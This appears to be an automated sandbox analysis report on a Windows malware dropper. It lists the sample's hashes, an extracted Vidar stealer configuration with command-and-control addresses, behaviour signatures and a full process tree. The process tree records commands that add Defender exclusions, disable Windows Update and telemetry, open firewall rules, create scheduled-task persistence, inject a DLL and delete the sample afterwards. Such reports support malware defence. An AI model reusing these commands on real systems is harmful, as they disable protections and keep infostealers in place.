Analysis

  • max time kernel
    299s
  • max time network
    303s
  • platform
    windows10-1703_x64
  • resource
    win10-20231020-en
  • resource tags

    arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
  • submitted
    22-10-2023 22:21

General

  • Target

    85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe

  • Size

    1.7MB

  • MD5

    a67b49df2160d1251ad1ee874d15f078

  • SHA1

    6fa51a0a8692ee0d363da5751990f3b4e64e6262

  • SHA256

    85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c

  • SHA512

    a06fcd19066c0cd300fc19c873fc050e906563f02c308da835e36c749c5623fb26ae0f074f827090c041a89f17199d2249246a10f2aed54ed9855913568460f8

  • SSDEEP

    24576:c+MOMrtZe51jnh98WLAcinXpRUEPR7MZPQeEt5BQcuCUrKhb:6OMrzKhbyi8PUWd

Malware Config

Extracted

Family

vidar

Version

6.1

Botnet

af2b108237a470d5313ebab11ef5d055

C2

https://steamcommunity.com/profiles/76561199563297648

https://t.me/twowheelfun

Attributes
  • profile_id_v2

    af2b108237a470d5313ebab11ef5d055

  • user_agent

    Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/605.1.15

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 12 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs 8 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 8 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 45 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 11 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3116
      • C:\Users\Admin\AppData\Local\Temp\85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe
        "C:\Users\Admin\AppData\Local\Temp\85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3792
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          3⤵
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3748
          • C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe
            "C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4704
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:520
            • C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe
              "C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"
              5⤵
              • Windows security bypass
              • Executes dropped EXE
              • Windows security modification
              • Adds Run key to start application
              • Checks for VirtualBox DLLs, possible anti-VM trick
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              PID:4496
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                6⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1584
              • C:\Windows\System32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                6⤵
                  PID:3428
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    7⤵
                    • Modifies Windows Firewall
                    PID:3016
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4228
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:432
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe
                  6⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Manipulates WinMonFS driver.
                  • Drops file in Windows directory
                  PID:1344
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    7⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:4500
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    7⤵
                    • Creates scheduled task(s)
                    PID:3156
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /delete /tn ScheduledUpdate /f
                    7⤵
                      PID:4296
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        8⤵
                          PID:1288
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        7⤵
                          PID:4152
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          7⤵
                            PID:2240
                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                            7⤵
                            • Executes dropped EXE
                            PID:4252
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              8⤵
                                PID:4076
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                              7⤵
                              • Creates scheduled task(s)
                              PID:3396
                            • C:\Windows\windefender.exe
                              "C:\Windows\windefender.exe"
                              7⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              PID:4152
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                8⤵
                                  PID:4368
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                    9⤵
                                    • Checks BIOS information in registry
                                    • Loads dropped DLL
                                    • Drops file in System32 directory
                                    • Launches sc.exe
                                    • Enumerates system info in registry
                                    PID:1048
                              • C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                7⤵
                                • Executes dropped EXE
                                PID:2228
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /delete /tn "csrss" /f
                                  8⤵
                                    PID:2936
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    schtasks /delete /tn "ScheduledUpdate" /f
                                    8⤵
                                      PID:1288
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        9⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:2240
                            • C:\Users\Admin\Pictures\Qw369efixtIBKFp9ZFZ0w0mq.exe
                              "C:\Users\Admin\Pictures\Qw369efixtIBKFp9ZFZ0w0mq.exe"
                              4⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4544
                            • C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe
                              "C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1124
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3252
                              • C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe
                                "C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"
                                5⤵
                                  PID:4328
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    6⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4928
                                  • C:\Windows\System32\cmd.exe
                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                    6⤵
                                      PID:2260
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        7⤵
                                          PID:4236
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                          7⤵
                                          • Modifies Windows Firewall
                                          • Modifies data under HKEY_USERS
                                          PID:8
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        6⤵
                                          PID:1028
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          6⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          PID:4136
                                    • C:\Users\Admin\Pictures\mAIqaeuuMoGky7kZVzMJ1DQQ.exe
                                      "C:\Users\Admin\Pictures\mAIqaeuuMoGky7kZVzMJ1DQQ.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1384
                                    • C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
                                      "C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe" --silent --allusers=0
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious use of WriteProcessMemory
                                      PID:1204
                                      • C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
                                        C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f848538,0x6f848548,0x6f848554
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:748
                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zhqw0x5VEifunzipVxSGz3iI.exe
                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zhqw0x5VEifunzipVxSGz3iI.exe" --version
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:4908
                                      • C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
                                        "C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1204 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231022222438" --session-guid=a91e09c5-c8ae-41cb-bbb5-f2b42ac0f326 --server-tracking-blob=MThmMjM3ZDcxY2RmMjgwYTE3M2NkYjNhMGYyZDljYzE3MTVhNjc5ZGIwOWQ0YWUwYWVhZWYxMDIyMDBiOTA1Mzp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODAxMzQ3NS42Nzk4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxNzM0NGZkMi0yYzJhLTRkMzktOGNkNS0xYjUzYTJhMWVhMDAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6004000000000000
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Suspicious use of WriteProcessMemory
                                        PID:4940
                                        • C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
                                          C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6e668538,0x6e668548,0x6e668554
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:4272
                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:4480
                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe" --version
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4908
                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe
                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x24c,0x250,0x254,0x228,0xac,0xe51588,0xe51598,0xe515a4
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:3648
                                    • C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe
                                      "C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks processor information in registry
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:696
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe" & exit
                                        5⤵
                                          PID:4308
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 6
                                            6⤵
                                            • Delays execution with timeout.exe
                                            PID:4124
                                      • C:\Users\Admin\Pictures\NjD3wZxeeWlSx5eQJUW3XsQg.exe
                                        "C:\Users\Admin\Pictures\NjD3wZxeeWlSx5eQJUW3XsQg.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:2856
                                        • C:\Users\Admin\AppData\Local\Temp\7zSFA7D.tmp\Install.exe
                                          .\Install.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2816
                                          • C:\Users\Admin\AppData\Local\Temp\7zSFBE4.tmp\Install.exe
                                            .\Install.exe /dcCcdidRiisJ "385118" /S
                                            6⤵
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Drops file in System32 directory
                                            • Enumerates system info in registry
                                            • Suspicious use of WriteProcessMemory
                                            PID:4364
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                              7⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3576
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                8⤵
                                                  PID:4568
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                7⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1300
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "gUGewEsHO" /SC once /ST 18:34:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                7⤵
                                                • Creates scheduled task(s)
                                                PID:5012
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /run /I /tn "gUGewEsHO"
                                                7⤵
                                                  PID:3540
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /DELETE /F /TN "gUGewEsHO"
                                                  7⤵
                                                    PID:4932
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe\" 3Y /WZsite_idDtn 385118 /S" /V1 /F
                                                    7⤵
                                                    • Creates scheduled task(s)
                                                    PID:320
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3268
                                        • C:\Windows\System32\cmd.exe
                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                          2⤵
                                            PID:4016
                                            • C:\Windows\System32\sc.exe
                                              sc stop WaaSMedicSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:2612
                                            • C:\Windows\System32\sc.exe
                                              sc stop UsoSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:5060
                                            • C:\Windows\System32\sc.exe
                                              sc stop wuauserv
                                              3⤵
                                              • Launches sc.exe
                                              PID:2780
                                            • C:\Windows\System32\sc.exe
                                              sc stop bits
                                              3⤵
                                              • Launches sc.exe
                                              PID:2444
                                            • C:\Windows\System32\sc.exe
                                              sc stop dosvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:4236
                                          • C:\Windows\System32\cmd.exe
                                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            2⤵
                                              PID:4448
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:196
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3104
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:592
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                3⤵
                                                  PID:4908
                                              • C:\Windows\System32\schtasks.exe
                                                C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                2⤵
                                                  PID:4844
                                                • C:\Windows\System32\schtasks.exe
                                                  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
                                                  2⤵
                                                  • Creates scheduled task(s)
                                                  PID:4624
                                                • C:\Windows\System32\schtasks.exe
                                                  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                  2⤵
                                                    PID:1632
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                    2⤵
                                                    • Drops file in System32 directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4528
                                                  • C:\Windows\System32\cmd.exe
                                                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                    2⤵
                                                      PID:5048
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop UsoSvc
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:3972
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop WaaSMedicSvc
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:4204
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop wuauserv
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:3644
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop bits
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:3264
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop dosvc
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:4220
                                                    • C:\Windows\System32\cmd.exe
                                                      C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                      2⤵
                                                        PID:4508
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          3⤵
                                                            PID:4624
                                                          • C:\Windows\System32\powercfg.exe
                                                            powercfg /x -hibernate-timeout-ac 0
                                                            3⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2260
                                                          • C:\Windows\System32\powercfg.exe
                                                            powercfg /x -hibernate-timeout-dc 0
                                                            3⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3528
                                                          • C:\Windows\System32\powercfg.exe
                                                            powercfg /x -standby-timeout-ac 0
                                                            3⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3332
                                                          • C:\Windows\System32\powercfg.exe
                                                            powercfg /x -standby-timeout-dc 0
                                                            3⤵
                                                              PID:2376
                                                          • C:\Windows\System32\schtasks.exe
                                                            C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"
                                                            2⤵
                                                            • Creates scheduled task(s)
                                                            PID:4076
                                                          • C:\Windows\System32\conhost.exe
                                                            C:\Windows\System32\conhost.exe
                                                            2⤵
                                                              PID:4564
                                                            • C:\Windows\explorer.exe
